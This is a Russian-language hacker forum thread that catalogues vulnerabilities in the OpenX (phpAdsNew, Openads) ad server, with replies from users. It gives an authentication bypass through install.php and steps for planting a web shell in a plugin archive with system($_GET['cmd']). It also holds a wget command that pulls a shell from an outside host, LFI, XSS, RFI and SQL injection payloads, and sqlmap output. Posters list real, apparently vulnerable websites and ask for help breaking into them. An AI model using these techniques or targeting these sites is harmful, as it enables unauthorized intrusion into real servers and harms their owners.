[ Обзор уязвимостей OpenX (phpAdsNew, Openads) ]
 

Обновлено 21.04.2010 (Спасибо всем за активность)

[ + ] Общая информация:
Сайт: http://openx.org
Текущая версия: OpenX 2.8.5

[ + ] Краткий экскурс в названия:
phpAdsNew, Openads, OpenX - это название одного продукта, которое менялось в течении времени.

phpAdsNew - название движка c версии 2.0 до 2.0.9
Openads - название движка c версии 2.0.10 до 2.4.3
OpenX - название движка c версии 2.4.4 до настоящего момента


[ + ] Структура БД:
>> ветка OpenX 2.6; OpenX 2.8
>> ветка OpenX 2.4
>> ветка OpenX 2.0

[ + ] Уязвимости для всей ветки OpenX 2.0 [phpAdsNew все версии, Openads до 2.0.11-pr1 включительно]
>> Раскрытие пути
условия:
+ display_errors = On

сплоит: >> XSS
условия:
+ register_globals = On

сплоит: >> Выполнение php кода
условия:
+ $phpAds_config['type_html_php'] = true; // default false
+ наличие html баннера
+ register_globals = On


сплоит: [ + ] Уязвимости phpAdsNew 2.0 - 2.0.5
>> Local File Include
http://securityreason.com/achievement_securityalert/21

сплоит: Примечание: возможно использовать ////[4096]//// как альтернатива null byte

[ + ] Уязвимости phpAdsNew 2.0 - 2.0.4-pr2
>> Выполнение php кода (XML-RPC Library Remote Code Execution)
http://www.securityfocus.com/bid/14088/info

сплоит:
[ + ] Уязвимости phpAdsNew 2.0 - 2.0.4-pr1
>> Раскрытие пути
http://securityreason.com/achievement_securityalert/9
условия:
+ display_errors = On

сплоит:
>> XSS
http://securityreason.com/achievement_securityalert/9

сплоит: [ + ] Уязвимости Openads 2.4.0 - 2.4.2
>> Выполнение php кода
сплоит: [ + ] Уязвимости OpenX 2.6.0 - 2.6.3
OpenX 2.4.4 - 2.4.9
Openads 2.4.0 - 2.4.3
>> Local File Include
http://milw0rm.org/exploits/7883
Условия:
+ magic_quotes_gpc = Off

сплоит: Примечание: используется функция file_exists - для проверки, поэтому ////[4096]//// не подойдет как альтернатива null byte

[ + ] Уязвимости OpenX 2.6.0 - 2.6.1
OpenX 2.4.4 - 2.4.8
Openads 2.4.0 - 2.4.3
>> SQL injection
Есть сплоит на milw0rm - мало того что написан как blind sql injection, хотя там обычная инъекция с выводом X_X, так он ещё и корявый, писал какой-то калека.

сплоит для OpenX 2.6.0 - 2.6.1:
Примечание: вывод будет в заголовок страницы <title> ... </title>

сплоит для OpenX 2.4.4 - 2.4.8
Openads 2.4.0 - 2.4.3:
Примечание: вывод будет в заголовок страницы <title> ... </title>

[ + ] Уязвимости OpenX 2.6.0 - 2.6.4
OpenX 2.4.4 - 2.4.10
Openads 2.4.0 - 2.4.3
>> Blind sql injection
условия:
+ magic_quotes_gpc = Off

Описаниe: http://resources.enablesecurity.com/advisories/openx-2.6.4-multiple.txt

[ + ] Уязвимости OpenX 2.8.0 - 2.8.5
>> Раскрытие пути
условия:
+ display_errors = On

сплоит:
[ + ] Уязвимости OpenX 2.8.0
>> Обход аутентификации пользователя

сплоит:
[ + ] Уязвимости OpenX 2.8.2 - 2.8.3
>> Раскрытие установочной информации

сплоит:
Уязвимости которых нет:
PS Если найдете какие либо неточности, ошибки или будут вопросы по уязвимостям, пишите в личку.

Загрузка шелла
 

Универсальный способ загрузки шелла.
условия:
+ Доступность на запись файла config.inc.php

Описание:
>> Для ветки OpenX 2.0
1.>> Для ветки OpenX 2.4
1.>> Для ветки OpenX 2.6
1. >> Для ветки OpenX 2.8
1.2. 3. 4.

OpenX 2.8.2, раскрытие пути:
/www/admin/plugins/oxMarket/library/OX/oxMarket/M2M/PearXmlRpcCustomClientExecutor.php
/www/admin/plugins/oxMarket/library/OX/oxMarket/M2M/ZendXmlRpcCustomClientExecutor.php
/www/admin/plugins/oxMarket/library/OX/oxMarket/Common/ConnectionUtils.php
/www/admin/plugins/oxMarket/library/OX/oxMarket/Common/Cache.php

Уязвимости OpenX 2.8.0
запрашиваем http:/site.com/openx/www/admin/install.php
оказываемся в админке если есть права на запись в кофиг фаил заливаем шелл
Уязвимости OpenX 2.8.2
В паблике реализации уязвимости пока не видел :
запрашиваем: http:/site.com/openx/www/admin/install.php
передаём постом параметры : btn_openads=1&btn_plugins=1
попадаем в админку заливаем шелл )
узязвимый код в install.php :
наличие btn_openads в посте пропускает нас дальше :
наличие btn_plugins пропускает нас в админку !
Альтернативный спосов заливки shell
Берем стандартный плагин для openx из папки etc/plugins/ скрипта установки.
Добавляем в начало любого из файлов system($_GET['cmd']) для примера : Открываем openX3rdPartyServers.zip и в /plugins/3rdPartyServers/ox3rdPartyServers/ файлу архива добавляем к adtech.class.php system($_GET['cmd']) сохраняем имеем универсальный шелл для версий выше 2.6
Для заливки шелла заходим в админку жмякаем кнопку плагинс в 2,8 версии (В 2,6 тыкаем конфиг->плагинс )в открышемся вкладке такаем кнопку обзор выбераем где у нас хранится наш изменённый openX3rdPartyServers.zip жмякаем на кнопку import code нажимаем кнопку конфиг и наш шелл подгружается ))) или по прямому адресу http:/site.com/openx/plugins/3rdPartyServers/ox3rdPartyServers/adtech.class.php )))))) ещём другую папку доступную для записи к примеру www/images/ (всегда доступна на запись ) и заливаем полноценный шелл к примеру (если есть wget)
"cd ../images/ && wget -O shell.php http://shell.com/shell.txt")
по адресу *www/images/shell.php имеем полноценный шелл

OpenX 2.8.0
OpenX 2.8.2
OpenX 2.8.3

Пока раскрытие установчной директории скрипта и некоторые настройки сервера:
И постом параметры:
btn_openads=1&btn_syscheck=1
Рабочий пример:
igromania.ru
http://bs.igromania.ru/www/admin/install.php

(Dm), спасибо огромное за обзор и остальным также.

Но есть вопрос - добыл из базы хеш и логин, хеш брученый был уже, поэтому ввел логин и пасс в админку - но мне пишет, что нужно включить куки для авторизации.
Куки, естественно, включены. Из-за чего такое может быть?

2попугай а openx вообше выдает баннеры на страницу ? :)
Я тут вот по какому вопросу зашел )))
http://securityreason.com/wlb_show/WLB-2010010098
кто нить что нибудь понимает ? лично я нет, где там иньекция ,сижу втупляю не могу не хрена понять :D и вообше какое это отношение к самому движку имеет то ? ((

В каком смысле "на страницу"? Хочешь посмотреть существующие банеры? В админке можно это сделать(точно не могу сказать где именно, ибо не помню и openx щас нет).

А насчет инъекции - может у тебя версия другая?

openx.pmgnews.com/www/admin/index.php - 2.8.1
arkansas-catholic.org/adserver/www/admin/index.php - 2.8.1
ikeafans.com/openx/www/admin/index.php - 2.8.2
mondofacto.com/openx/www/admin/index.php - 2.8.2
ultimatecampresource.com/openads/www/admin/index.php - 2.8.3
a.soft32.com/www/admin/index.php - 2.8.3

почему не работает install.php этой ссылки?

почему не работает?
http://a.soft32.com/www/admin/install.php
http://mondofacto.com/openx/www/admin/install.php

и так далее....
ты видимо не внимательно читал ...
написано же , что обратится надо к скрипту install.php c POST параметрами
btn_openads=1&btn_syscheck=1

не имеет никакого отношения.

OpenX 2.6.4
LFI
Need: Права админа
/openx/www/admin/stats.php?entity=../../../../../../shell&breakdown=Обязательно пустое.
// shell, у меня там просто в папке с OpenX лежит файл shell.php, там <?PHP phpinfo(); ?> Код выполнился.
Если breakdown не вписать, то будет инклюдиться нечто вроде:
openx/lib/OA/Admin/Statistics/Delivery/Controller/../../../../../../shellAdvertiser.php

Ну вроде тот код, т.к. искал по началу в слепую.


Пассивная XSS:

openx/www/admin/stats.php?entity=campaign&breakdown=history&client id=1&campaignid=1'%22%3E%3Cscript%3Ealert();%3C/script%3E

http://downloads.securityfocus.com/vulnerabilities/exploits/37110.rb

нет новой уязвимости в системе OpenX? Меня интересует больше 2.8.1 и 2.8.2. Я не понимаю, как загрузить оболочку, используя btn_openads = 1 и btn_syscheck = 1.

Я здесь еще сайты ..

adserv.eightyfourmedia.com/www/admin/index.php - 2.8.2

openx.rsv05-jugend.de/www/admin/index.php - 2.8.2

ads.apj.dk/www/admin/index.php- 2.8.1

www.mobilescandinavia.dk/openads/www/admin/index.php - 2.8.5

banner.danske-it-eksperter.dk/www/admin/index.php - 2.8.4

openx.findpriser.dk/admin/index.php - 2.8.1

ads.gld.dk/www/admin/index.php - 2.8.5

ads2.dk-kogebogen.dk/www/admin/index.php - 2.8.5

jjokker Вы можете написать здесь шаг за шагом? спасибо

Уязвимости openX

openX 2.8.6

Path disclosure

http://localhost/openx-2.8.6/www/admin/plugins/openXWorkflow/application/bootstrap.php

Path disclosure

display_errors = On

Path disclosure

display_errors = On

барыжная XSS

ofc_upload_image.php

Записываем шелл

ofc_upload_image.php

rg on

Если б небыло дальше exit(), то можно было лить шелл бес зависимости.

будет текст:

Шелл будет тут:

localhost/openx-2.8.6 змаенить на [host]/[path]

скоро буду дальше смотреть(времени мало) ...

Решил почитать о $HTTP_RAW_POST_DATA

Оказуетцо, если register_globals off, то все же писать данные в файл возможно.

Только данные урл-кодируютцо, если не урл-кодированные, то мы имеем шелл.

Как послать данные не урл-кодированные думаю все вы знаете.

В $HTTP_RAW_POST_DATA заганяютцо пост-даные напрямую.

в php.ini должно быть

файл 1.php:

обращаемся:

результат:

data=12345

експлоит:

Наш шелл в даном случае тут:

заменяем localhost/openx-2.8.6 на [host]/[path]

Хе-хе, самое интересное, когда пихать с атрибутом enctype, то нет никакого результата.

зы

PHP Version 5.2.14, нужная директива была закоментирована

Для OpenX 2.8.1 эксп находится по адресу install-plugin.php?status=1&plugin=openXMarket

Почему на конкретном примере по адресу http://www.freegolfschool.com/oa/www/admin/install-plugin.php?status=1&plugin=openXMarket он не работает?

Для версии OpenX 2.8.4 эксп для видео плагина расположен в ofc_upload_image.php.

Я нашел похаканый сайт http://www.knockknockrecords.com/openx/www/admin/plugins/videoReport/lib/tmp-upload-images/, где x.php и cloud.php уже кемто загружены.

Я пробую заюзать http://www.knockknockrecords.com/openx/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php?name=1.php&HTTP_RAW_POST_DATA = ,

но 1.php пуст. Почему?

pXSS

/plugins/deliveryLimitations/Client/lib/phpSniff/index.php

/plugins/deliveryLimitations/Client/lib/phpSniff/phpSniff.class.php

Проверил на OpenX 2.8.1, 2.8.2, 2.8.3, 2.8.4, 2.8.6, 2.8.7.

Path disclosure

условия -> никаких

на данный момент на последней ветке 2.8.7 что нашел --> работает

gabarea,

1.

http://openx-2.8.1/www/admin/install-plugin.php?status=1&plugin=openXMarket

Там path disclosure не смотря код. Надо посмотреть код.

2.

Потому что для експулатации нет условий.

В даном случае:

Ну если возможно переопределить $HTTP_RAW_POST_DATA как то бес етих директив, то я буду не прав.

(Dm) ты забыл сказать что в phpAdsNew должна быть включена опция:

Опции HTML-баннеров =>Разрешить выполнение PHP-выражений из HTML-баннера

тогда код будет выполнятся, если опция неактивна, то в html-сырцах страницы мы увидим php-код

к сожалению я не так много видел сайтов, где эта опция активирована. а обычно на сайтах запирают файл config.inc.php и шел уже таким способом не залить

Openads v2.3.35-beta

слепая скуля

http://target.com/ads/www/delivery/ac.php?bannerid=24 and 1=1

не знаю может и баян, но в ветке нету

2.0.11 RFI

http://www.site.com/Openads-2.0.11/libraries/lib-view-main.inc.php?row=http://evil.txt?

openx 2.8.7 exploit



openx 2.8.7

Хз нашел вчера мало полезно но хоть что то скуля в админке Слепая как крот

http://test.com/www/admin/updates-history.php

POST_data:

P.S Чуток покурил маны мускла склуля не слепая вывод есть

sqlmap -u "http://admin.oads.vimg.net/www/admin/updates-history.php" --method "POST" --data "btn_clean_audit=Delete+Artifacts&upgrade_action_i d=7" --dbs

[04:44:20] [INFO] testing connection to the target url

[04:44:21] [INFO] testing if the url is stable, wait a few seconds

[04:44:24] [INFO] url is stable

[04:44:24] [INFO] testing if POST parameter 'btn_clean_audit' is dynamic

[04:44:25] [WARNING] POST parameter 'btn_clean_audit' is not dynamic

[04:44:25] [INFO] testing if POST parameter 'upgrade_action_id' is dynamic

[04:44:25] [WARNING] POST parameter 'upgrade_action_id' is not dynamic

[04:44:25] [INFO] testing if Cookie parameter 'sessionID' is dynamic

[04:44:26] [WARNING] Cookie parameter 'sessionID' is not dynamic

[04:44:26] [INFO] testing if Cookie parameter 'OAGEO' is dynamic

[04:44:27] [WARNING] Cookie parameter 'OAGEO' is not dynamic

[04:44:27] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic

[04:44:27] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[*] shutting down at: 04:44:27

не работает

Во первых желательно авторизоватся )))

А дальше xakep.ru/post/52222/default.asp - курить сдесь )

Помогите с заливкой шелла. Нашел данную уязвимость.

выполняется

выполняется

не выполняется

пробовал аналогично и fetch, и curl - не хочет заливать.

также пробовал указать адрес site2.ru без http, пробовал закодировать в ascii, в base64 и т.д.

Как залить шелл?

может там нет права на запись? ну или попробуй:

wget http://sait.ru/shell.txt -O /home/polniu put' do papki/shell.php

Пусть можно легко узнать с помощью pwd

Раскрытие путей, тестил на OpenX 2.8.7, 2.8.8

Exploit:

P.S. Сегодня выручила

sql injection

версия openx 2.4.4

Данная уязвимость не выполняется. Пробовал на других сайтах и другие версии (2.6.0).

Подскажите пожалуйста как правильно ее использовать.

может префиксы другие, или таблицы старые! раскручивай просто как инъекцию, а не этому шаблону!

если нет то кидай сцыль

Да, все понял, префиксы везде разные.

OpenX 2.8.8

Path closure (300):